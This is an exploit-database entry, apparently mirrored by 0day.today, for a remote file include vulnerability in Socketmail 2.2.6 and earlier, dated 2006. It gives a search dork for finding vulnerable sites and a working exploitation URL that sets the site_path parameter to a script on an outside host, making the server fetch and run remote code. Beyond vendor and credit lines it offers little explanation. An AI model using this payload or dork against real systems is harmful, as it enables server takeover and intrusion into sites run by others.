id: 445
date: 05/24/2006
title: Socketmail <= 2.2.6 (site_path) Remote File Include Vulnerability
author: Aesthetico
cves: 

=================================================================
Socketmail <= 2.2.6 (site_path) Remote File Include Vulnerability
=================================================================



Title: Socketmail <= 2.2.6 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: Creative Digital Resources
URL: http://socketmail.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by SocketMail"
-----------------------------------------------------------------

Exploitation(tested with Lite-Edition and Pro-Edition):

/index.php?site_path=http://www.yourspace.com/yourscript.php?




#  0day.today [2023-03-21]  #